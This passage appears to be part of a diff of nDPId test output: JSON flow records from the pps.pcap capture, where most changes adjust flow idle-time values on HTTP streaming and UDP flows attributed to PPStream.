{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353150114,"flow_last_seen":1467353150272,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1038,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50485,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353155790,"flow_last_seen":1467353155790,"flow_idle_time":7560000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50487,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353157468,"flow_last_seen":1467353157533,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":1037,"flow_avg_l4_payload_len":518,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50493,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353165300,"flow_last_seen":1467353165845,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":3117,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50495,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353172912,"flow_last_seen":1467353180202,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1930,"flow_avg_l4_payload_len":643,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353180357,"flow_last_seen":1467353180443,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1038,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353185940,"flow_last_seen":1467353186002,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":774,"flow_avg_l4_payload_len":387,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189363,"flow_last_seen":1467353189363,"flow_idle_time":7560000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190110,"flow_last_seen":1467353190110,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50506,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190110,"flow_last_seen":1467353190110,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00789{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1467353202192,"flow_last_seen":1467353202428,"flow_idle_time":7560000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":3039,"flow_avg_l4_payload_len":607,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"proto":"Unknown","breed":"Unrated","category":"Download"}} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136835,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.37.142.173","src_port":22793,"dst_port":1074,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136835,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.37.142.173","src_port":22793,"dst_port":1074,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1467353136440,"flow_last_seen":1467353136952,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":12973,"flow_avg_l4_payload_len":288,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"219.228.107.156","src_port":22793,"dst_port":1250,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.233.39.81","src_port":22793,"dst_port":18590,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.233.39.81","src_port":22793,"dst_port":18590,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353138931,"flow_last_seen":1467353139050,"flow_idle_time":7440000,"flow_min_l4_payload_len":653,"flow_max_l4_payload_len":690,"flow_tot_l4_payload_len":1343,"flow_avg_l4_payload_len":671,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353138931,"flow_last_seen":1467353139050,"flow_idle_time":7560000,"flow_min_l4_payload_len":653,"flow_max_l4_payload_len":690,"flow_tot_l4_payload_len":1343,"flow_avg_l4_payload_len":671,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136838,"flow_last_seen":1467353136838,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.133.182","src_port":22793,"dst_port":17788,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136838,"flow_last_seen":1467353136838,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.133.182","src_port":22793,"dst_port":17788,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353165563,"flow_last_seen":1467353165659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":950,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":379,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353144819,"flow_last_seen":1467353144913,"flow_idle_time":7440000,"flow_min_l4_payload_len":229,"flow_max_l4_payload_len":390,"flow_tot_l4_payload_len":619,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"140.205.243.64","src_port":50482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353165563,"flow_last_seen":1467353165659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":950,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":379,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353144819,"flow_last_seen":1467353144913,"flow_idle_time":7560000,"flow_min_l4_payload_len":229,"flow_max_l4_payload_len":390,"flow_tot_l4_payload_len":619,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"140.205.243.64","src_port":50482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"61.227.170.88","src_port":22793,"dst_port":20227,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"61.227.170.88","src_port":22793,"dst_port":20227,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"121.248.133.93","src_port":22793,"dst_port":12757,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"121.248.133.93","src_port":22793,"dst_port":12757,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353195852,"flow_last_seen":1467353195956,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":1037,"flow_avg_l4_payload_len":518,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50771,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353195852,"flow_last_seen":1467353195956,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":1037,"flow_avg_l4_payload_len":518,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50771,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 
00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.112.31.89","src_port":22793,"dst_port":29072,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.112.31.89","src_port":22793,"dst_port":29072,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196104,"flow_last_seen":1467353196204,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":865,"flow_tot_l4_payload_len":1010,"flow_avg_l4_payload_len":505,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50773,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196393,"flow_last_seen":1467353196523,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":678,"flow_avg_l4_payload_len":339,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50774,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196104,"flow_last_seen":1467353196204,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":865,"flow_tot_l4_payload_len":1010,"flow_avg_l4_payload_len":505,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50773,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196393,"flow_last_seen":1467353196523,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":678,"flow_avg_l4_payload_len":339,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50774,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1467353136835,"flow_last_seen":1467353136837,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.41.144.153","src_port":22793,"dst_port":10492,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1467353136835,"flow_last_seen":1467353136837,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.41.144.153","src_port":22793,"dst_port":10492,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"61.223.204.67","src_port":22793,"dst_port":11102,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"61.223.204.67","src_port":22793,"dst_port":11102,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353167288,"flow_last_seen":1467353167373,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":640,"flow_tot_l4_payload_len":785,"flow_avg_l4_payload_len":392,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50498,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353157433,"flow_last_seen":1467353157718,"flow_idle_time":7440000,"flow_min_l4_payload_len":335,"flow_max_l4_payload_len":463,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":420,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.13.3","src_port":50492,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353170523,"flow_last_seen":1467353171307,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":1043,"flow_tot_l4_payload_len":1188,"flow_avg_l4_payload_len":594,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.76","src_port":50499,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} 